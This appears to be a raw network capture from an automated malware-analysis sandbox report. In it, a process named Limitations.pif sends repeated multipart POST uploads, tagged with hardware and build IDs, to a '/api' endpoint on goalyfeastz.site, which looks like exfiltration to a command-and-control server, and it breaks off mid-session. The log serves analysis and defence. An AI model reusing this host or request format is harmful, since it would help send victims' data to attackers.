                                                              Data Ascii: iElbWf7KuVen7RDjANd6ytLHG12H12unXaoY4eiX1SspzH5dTEq5d2e8pBCkBi7bdscbOSKjy2fdSkhRHKOxmnhJW7meK8gXR51gAiCnOlrSV9ttd1eP42l6CWXpFzM7iPi7eD5+6YP26cBDxAJeOqLXK+1nxyunTRqYMRzzkSso6PtZXqpYhxctEHNgx8pu5iNrjKMiT+VtCknFz8MBy7g5H9i6m3x3Z7nFtwDnisvC1kutxgcLt+2qSAHsw0H
                                                              2024-10-30 14:44:33 UTC1369INData Raw: 39 69 36 6d 33 78 33 5a 37 6e 46 74 77 44 48 53 6a 70 53 5a 79 76 39 56 2f 65 62 31 2f 31 4b 71 4a 46 4d 63 30 46 72 6d 4e 69 72 75 55 34 4b 71 43 59 33 4c 56 44 7a 78 41 4d 2b 4f 70 4e 44 62 6e 6b 6c 31 37 71 48 76 34 70 4a 38 58 69 53 78 63 72 4d 53 41 73 64 53 2f 37 6f 42 30 66 39 63 46 4f 41 42 76 70 71 41 6e 64 37 58 55 63 33 47 79 66 74 65 6d 6a 68 6a 46 4d 78 57 79 6c 70 57 34 6b 76 57 6b 78 7a 38 33 32 78 74 77 57 44 32 56 76 6a 74 6e 71 5a 42 48 66 37 42 32 30 4c 48 4f 41 59 63 71 55 72 4b 49 78 2b 58 55 37 4b 36 4c 64 6e 2f 61 42 7a 67 50 63 71 71 38 4c 58 71 78 77 48 56 38 74 33 62 59 71 34 63 54 7a 6a 34 5a 76 34 6d 44 75 70 57 6e 34 4d 64 32 62 35 78 62 63 44 5a 74 72 71 49 43 66 62 50 62 4d 6d 50 77 59 5a 65 67 67 6c 36 52 63 78 61 35 6a 49
                                                              Data Ascii: 9i6m3x3Z7nFtwDHSjpSZyv9V/eb1/1KqJFMc0FrmNiruU4KqCY3LVDzxAM+OpNDbnkl17qHv4pJ8XiSxcrMSAsdS/7oB0f9cFOABvpqAnd7XUc3GyftemjhjFMxWylpW4kvWkxz832xtwWD2VvjtnqZBHf7B20LHOAYcqUrKIx+XU7K6Ldn/aBzgPcqq8LXqxwHV8t3bYq4cTzj4Zv4mDupWn4Md2b5xbcDZtrqICfbPbMmPwYZeggl6Rcxa5jI
                                                              2024-10-30 14:44:33 UTC1369INData Raw: 71 34 4e 32 63 39 6f 4d 63 45 34 39 70 4c 5a 73 4c 76 2f 39 56 55 6e 38 57 65 33 6e 6b 56 44 51 63 78 57 35 78 4e 2f 39 6d 4f 53 69 6a 33 35 78 31 51 38 36 43 58 61 76 70 53 68 36 74 74 64 30 66 62 74 39 31 71 4f 43 46 4d 38 77 45 62 71 4c 69 4c 58 55 71 65 36 41 61 54 65 45 51 78 55 58 64 71 32 6f 62 47 6e 78 79 7a 4a 37 73 6a 69 50 35 34 49 58 7a 7a 55 58 75 59 57 42 74 5a 48 76 71 6f 5a 33 63 64 38 4d 4e 41 56 38 72 4b 6f 67 65 4c 58 54 63 33 43 31 64 39 79 69 7a 6c 43 4a 4e 41 72 31 33 4d 65 4d 6c 2f 47 35 6c 33 30 33 77 30 30 70 51 48 71 76 37 6e 51 32 76 73 42 34 64 72 42 39 32 4b 4b 4e 45 63 34 2b 46 4c 6d 4f 6a 72 57 53 36 4b 65 56 63 6e 76 53 42 44 34 4d 63 36 36 6b 4c 33 76 2f 6e 44 4a 37 70 6a 69 50 35 36 49 5a 78 42 30 5a 75 59 50 48 6f 74 72
                                                              Data Ascii: q4N2c9oMcE49pLZsLv/9VUn8We3nkVDQcxW5xN/9mOSij35x1Q86CXavpSh6ttd0fbt91qOCFM8wEbqLiLXUqe6AaTeEQxUXdq2obGnxyzJ7sjiP54IXzzUXuYWBtZHvqoZ3cd8MNAV8rKogeLXTc3C1d9yizlCJNAr13MeMl/G5l303w00pQHqv7nQ2vsB4drB92KKNEc4+FLmOjrWS6KeVcnvSBD4Mc66kL3v/nDJ7pjiP56IZxB0ZuYPHotr
                                                              2024-10-30 14:44:33 UTC1369INData Raw: 58 44 45 51 32 68 41 53 36 53 2b 50 48 58 39 34 32 52 2f 71 48 50 61 71 38 34 42 68 79 70 53 73 6f 6a 48 35 64 54 68 6f 59 35 79 65 4e 30 4b 50 41 31 34 71 71 73 74 63 4c 76 59 65 48 79 34 66 74 61 69 68 42 33 49 4f 52 75 79 6a 49 43 2b 68 71 66 67 78 33 5a 76 6e 46 74 77 4b 58 71 78 6f 44 77 32 6f 4a 78 72 50 4c 6c 30 6c 2f 2f 4f 47 73 4d 38 46 72 4b 49 67 62 69 53 36 71 2b 49 63 48 66 54 42 7a 73 4a 65 36 4b 6a 4b 58 75 37 77 48 68 33 73 58 54 65 71 34 4e 65 68 33 4d 56 72 63 54 66 2f 61 58 71 6f 49 6c 32 59 5a 77 63 66 68 6b 39 70 4b 4a 73 4c 76 2f 54 66 6e 4f 39 64 39 53 6b 6a 78 54 62 49 52 36 38 6a 49 4b 78 6e 2b 6d 6f 6c 58 64 34 31 51 41 7a 43 58 71 72 6f 69 5a 31 75 4a 49 38 50 4c 6c 67 6c 2f 2f 4f 50 64 34 6a 48 2f 57 62 79 61 54 55 34 4b 4c 48
                                                              Data Ascii: XDEQ2hAS6S+PHX942R/qHPaq84BhypSsojH5dThoY5yeN0KPA14qqstcLvYeHy4ftaihB3IORuyjIC+hqfgx3ZvnFtwKXqxoDw2oJxrPLl0l//OGsM8FrKIgbiS6q+IcHfTBzsJe6KjKXu7wHh3sXTeq4Neh3MVrcTf/aXqoIl2YZwcfhk9pKJsLv/TfnO9d9SkjxTbIR68jIKxn+molXd41QAzCXqroiZ1uJI8PLlgl//OPd4jH/WbyaTU4KLH
                                                              2024-10-30 14:44:33 UTC1369INData Raw: 63 30 42 33 69 67 6f 69 64 78 76 4e 31 32 64 62 42 78 32 4f 66 41 58 73 34 72 55 75 33 45 70 71 61 58 36 36 50 48 62 6a 6e 46 51 7a 63 4d 50 66 76 75 49 48 69 36 30 6e 68 36 75 6e 33 52 72 59 73 65 77 6a 41 64 73 59 4b 44 73 70 54 73 70 34 5a 33 63 74 59 49 4e 67 31 2b 70 61 68 73 4f 50 2f 56 61 6a 7a 6d 4f 50 65 38 67 78 4c 4f 63 77 33 37 6e 63 65 36 6d 4b 66 32 78 33 70 37 32 41 51 77 44 58 36 72 71 79 68 38 75 74 4a 36 62 72 5a 34 30 4c 57 63 48 73 41 32 48 72 61 45 67 37 75 64 34 61 32 44 4d 54 6d 63 42 43 68 41 4a 65 4f 44 49 48 47 57 31 57 6b 38 6f 54 62 4f 35 34 6b 53 69 57 74 53 74 49 2b 4e 73 70 6e 6b 71 49 52 36 63 74 59 43 4e 77 68 77 73 61 30 6a 65 62 76 53 66 58 71 34 65 64 69 68 69 52 66 49 4f 78 58 31 79 73 65 36 6a 4b 66 32 78 31 39 77 33
                                                              Data Ascii: c0B3igoidxvN12dbBx2OfAXs4rUu3EpqaX66PHbjnFQzcMPfvuIHi60nh6un3RrYsewjAdsYKDspTsp4Z3ctYINg1+pahsOP/VajzmOPe8gxLOcw37nce6mKf2x3p72AQwDX6rqyh8utJ6brZ40LWcHsA2HraEg7ud4a2DMTmcBChAJeODIHGW1Wk8oTbO54kSiWtStI+NspnkqIR6ctYCNwhwsa0jebvSfXq4edihiRfIOxX1yse6jKf2x19w3
                                                              2024-10-30 14:44:33 UTC1369INData Raw: 39 6c 71 30 69 65 4c 6a 45 59 7a 47 5a 59 74 71 68 6d 51 2b 4a 66 56 4b 7a 78 4e 2f 74 32 71 65 71 6c 6a 45 76 6a 46 46 72 56 53 37 30 2f 6e 35 70 38 63 73 79 61 76 34 67 68 65 6e 4f 44 49 6c 72 55 76 4b 48 6c 61 2b 53 35 4c 69 45 4e 6b 6e 69 4c 54 63 47 65 4b 53 2b 62 6c 69 30 78 6e 55 38 38 44 6a 59 35 39 59 6e 69 58 74 53 69 73 72 48 70 64 53 2f 37 72 4a 79 65 64 49 45 4a 68 45 77 6a 61 6b 71 63 37 6a 43 4d 46 4b 31 62 4e 44 6e 77 46 37 50 63 30 72 6c 79 73 65 35 68 61 66 32 31 79 4d 73 69 56 42 6e 55 43 2b 38 34 44 55 32 71 5a 49 71 4c 76 41 34 78 65 66 57 58 6f 34 77 41 4b 65 43 68 4b 75 58 6f 4a 43 35 63 6d 48 52 44 44 73 42 51 35 32 41 49 58 65 38 33 44 42 4e 71 48 58 48 70 49 73 5a 39 77 30 63 73 70 43 41 73 35 4c 6e 37 73 6b 78 65 4a 78 62 43 55
                                                              Data Ascii: 9lq0ieLjEYzGZYtqhmQ+JfVKzxN/t2qeqljEvjFFrVS70/n5p8csyav4ghenODIlrUvKHla+S5LiENkniLTcGeKS+bli0xnU88DjY59YniXtSisrHpdS/7rJyedIEJhEwjakqc7jCMFK1bNDnwF7Pc0rlyse5haf21yMsiVBnUC+84DU2qZIqLvA4xefWXo4wAKeChKuXoJC5cmHRDDsBQ52AIXe83DBNqHXHpIsZ9w0cspCAs5Ln7skxeJxbCU
                                                              2024-10-30 14:44:33 UTC1369INData Raw: 62 43 37 76 67 43 6b 70 37 53 2b 48 39 5a 46 51 30 48 4d 45 39 64 7a 56 38 39 54 31 37 74 38 78 4d 4e 38 52 49 67 5a 2b 74 61 31 72 53 49 48 31 66 48 75 2f 62 73 65 71 67 6a 2f 4b 49 68 69 4c 75 70 4b 2b 6d 75 6d 70 6b 57 41 33 6b 6b 4d 2f 51 43 57 61 37 6d 51 32 67 4a 77 79 5a 50 34 67 6c 35 4b 4e 45 4d 63 30 42 4b 54 4a 6f 4c 4f 54 35 72 69 58 66 48 76 39 41 43 45 4b 50 65 33 75 4b 6a 62 6e 67 44 77 38 75 6d 6d 58 2f 39 35 4d 6b 6d 5a 42 34 74 54 56 6f 74 72 2b 37 70 45 78 4c 34 35 4e 63 42 49 39 2b 2b 35 72 64 61 33 41 64 48 2b 6f 65 35 43 5a 73 44 76 65 4d 41 4b 7a 68 37 6d 44 76 2b 75 6f 67 47 74 77 32 69 55 51 51 44 50 6a 6f 57 77 75 68 70 49 36 50 49 45 32 6c 37 2f 4f 52 6f 6b 47 45 62 75 4b 67 4b 75 46 71 6f 75 51 63 6d 66 61 41 48 42 4f 50 61 58
                                                              Data Ascii: bC7vgCkp7S+H9ZFQ0HME9dzV89T17t8xMN8RIgZ+ta1rSIH1fHu/bseqgj/KIhiLupK+mumpkWA3kkM/QCWa7mQ2gJwyZP4gl5KNEMc0BKTJoLOT5riXfHv9ACEKPe3uKjbngDw8ummX/95MkmZB4tTVotr+7pExL45NcBI9++5rda3AdH+oe5CZsDveMAKzh7mDv+uogGtw2iUQQDPjoWwuhpI6PIE2l7/ORokGEbuKgKuFqouQcmfaAHBOPaX
                                                              2024-10-30 14:44:33 UTC1369INData Raw: 34 45 38 50 4b 77 34 6a 2b 66 4a 45 4d 51 79 45 62 75 48 6c 61 2b 53 35 4c 69 45 4e 6b 6e 69 4c 44 73 42 62 61 36 2f 49 58 4b 70 37 45 78 62 75 48 33 51 6d 62 41 70 32 44 51 43 39 36 4b 45 71 35 65 6e 34 4d 64 70 4e 34 52 44 46 77 5a 34 70 4f 35 69 4e 72 75 53 4b 6a 79 52 63 39 61 33 67 77 2f 45 4e 77 54 33 6f 34 47 34 6b 36 66 67 78 33 30 33 68 45 4d 2f 45 58 71 6c 71 79 73 36 75 4d 68 31 50 50 41 34 32 65 66 57 58 73 59 69 46 62 4f 42 67 50 47 53 36 61 44 48 62 6a 6e 46 51 79 5a 41 4a 66 44 67 62 47 54 2f 69 6a 49 37 73 48 58 57 70 49 41 64 32 79 45 55 74 70 4b 45 2b 71 72 5a 6a 70 64 79 59 39 73 79 50 51 52 72 74 71 30 38 63 59 48 73 55 6d 79 39 62 4e 44 6f 72 67 37 45 4a 67 4f 79 6c 4c 6d 44 6f 2f 61 70 6c 7a 4e 52 33 78 55 7a 51 44 50 6a 74 6d 77 75
                                                              Data Ascii: 4E8PKw4j+fJEMQyEbuHla+S5LiENkniLDsBba6/IXKp7ExbuH3QmbAp2DQC96KEq5en4MdpN4RDFwZ4pO5iNruSKjyRc9a3gw/ENwT3o4G4k6fgx303hEM/EXqlqys6uMh1PPA42efWXsYiFbOBgPGS6aDHbjnFQyZAJfDgbGT/ijI7sHXWpIAd2yEUtpKE+qrZjpdyY9syPQRrtq08cYHsUmy9bNDorg7EJgOylLmDo/aplzNR3xUzQDPjtmwu


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.649987172.67.145.2034431832C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-30 14:44:34 UTC282OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 12865
                                                              Host: goalyfeastz.site
                                                              2024-10-30 14:44:34 UTC12865OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 39 39 35 45 34 44 39 46 35 32 44 35 34 31 46 46 31 41 35 43 39 38 32 35 33 44 42 46 30 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 4d 6f 6e 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB995E4D9F52D541FF1A5C98253DBF0B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"BVnUqo--@Mone
                                                              2024-10-30 14:44:35 UTC1010INHTTP/1.1 200 OK
                                                              Date: Wed, 30 Oct 2024 14:44:35 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=ndain36r24c8ehp0ql9f0iqchk; expires=Sun, 23 Feb 2025 08:31:13 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WblAjPtS6%2FGSnH%2BwMdCtAwtpnPp0ILGAQctHlqkOhPU3iXfvYAiu0sE1v%2FAcXiPzTCF7ycW9QWCQLfEnnNzxqpjfeDAmBRafvDdZ45Z3Y4AjjcMgmsaKgnL924fpbUyD05um"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8dac2f245feceb33-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1101&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13805&delivery_rate=2567375&cwnd=244&unsent_bytes=0&cid=67c0c66916e53479&ts=666&x=0"
                                                              2024-10-30 14:44:35 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                              Data Ascii: 11ok 173.254.250.78
                                                              2024-10-30 14:44:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.649988172.67.145.2034431832C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-30 14:44:35 UTC282OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 15111
                                                              Host: goalyfeastz.site
                                                              2024-10-30 14:44:35 UTC15111OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 39 39 35 45 34 44 39 46 35 32 44 35 34 31 46 46 31 41 35 43 39 38 32 35 33 44 42 46 30 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 4d 6f 6e 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB995E4D9F52D541FF1A5C98253DBF0B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"BVnUqo--@Mone
                                                              2024-10-30 14:44:36 UTC1012INHTTP/1.1 200 OK
                                                              Date: Wed, 30 Oct 2024 14:44:36 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=ad64flaf9o92bve4c6qf7c8mfk; expires=Sun, 23 Feb 2025 08:31:15 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n1zX9XQDUtdwkG%2FR7rDNPrrRIVfgArFz2azmGrC2TJNQUPu3ls4Ig1Ac7DbjlJ44G1OHWVy%2Fx%2BRFygtUr1bLwoB9cJWGz0y4XFKZ7iwj8%2BkLIc35W0U88maCgYWbe3qMXeYH"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8dac2f2b9d971449-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1311&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2839&recv_bytes=16051&delivery_rate=2540350&cwnd=249&unsent_bytes=0&cid=4c32ca7a8712fa1e&ts=756&x=0"
                                                              2024-10-30 14:44:36 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                              Data Ascii: 11ok 173.254.250.78
                                                              2024-10-30 14:44:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.649989172.67.145.2034431832C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-30 14:44:37 UTC282OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 19969
                                                              Host: goalyfeastz.site
                                                              2024-10-30 14:44:37 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 39 39 35 45 34 44 39 46 35 32 44 35 34 31 46 46 31 41 35 43 39 38 32 35 33 44 42 46 30 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 4d 6f 6e 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB995E4D9F52D541FF1A5C98253DBF0B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"BVnUqo--@Mone
                                                              2024-10-30 14:44:37 UTC4638OUTData Raw: 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f
                                                              Data Ascii: 2+?2+?2+?o?Mp5
                                                              2024-10-30 14:44:38 UTC1019INHTTP/1.1 200 OK
                                                              Date: Wed, 30 Oct 2024 14:44:38 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=4kcv73t02nl6m9k64r7j8s4dct; expires=Sun, 23 Feb 2025 08:31:16 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0e6%2BExIWJ3vnAgM8lROsPGh7%2BxLSoGTZtfAtUdR2Uzan%2FBfkGOc%2B7Ju5hwzxwX%2B3%2BNosxUCuxNTRQ88UkjO3dHP6y6izXrOXT82NpQnKzab1UPBVUhMn99eg%2F3LIyipX9Nk"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8dac2f3678d10c17-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1547&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2841&recv_bytes=20931&delivery_rate=1846938&cwnd=251&unsent_bytes=0&cid=18fedaea860a72eb&ts=954&x=0"
                                                              2024-10-30 14:44:38 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                              Data Ascii: 11ok 173.254.250.78
                                                              2024-10-30 14:44:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.649990172.67.145.2034431832C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-30 14:44:38 UTC281OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 7140
                                                              Host: goalyfeastz.site
                                                              2024-10-30 14:44:38 UTC7140OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 39 39 35 45 34 44 39 46 35 32 44 35 34 31 46 46 31 41 35 43 39 38 32 35 33 44 42 46 30 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 4d 6f 6e 65
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB995E4D9F52D541FF1A5C98253DBF0B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"BVnUqo--@Mone
                                                              2024-10-30 14:44:39 UTC1009INHTTP/1.1 200 OK
                                                              Date: Wed, 30 Oct 2024 14:44:39 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=u4d2292n07dcaksen07ms2e2km; expires=Sun, 23 Feb 2025 08:31:18 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YI18ZgY8yPGbuUGvE8joCa9CtfB04IcM6Qc9mMXnq8%2FdXBCYz4c%2B5DhBul1RuGHLOvV2wztfdBEuWUEucBdLrV8Gn%2BK7BedcxLOoEzIZJmCCGimhRDkZSUonhMOUIdlNNeJI"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8dac2f3eff014624-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1238&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2841&recv_bytes=8057&delivery_rate=2407315&cwnd=251&unsent_bytes=0&cid=77ce6f1772e0d840&ts=470&x=0"
                                                              2024-10-30 14:44:39 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                              Data Ascii: 11ok 173.254.250.78
                                                              2024-10-30 14:44:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.649991172.67.145.2034431832C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-30 14:44:39 UTC281OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
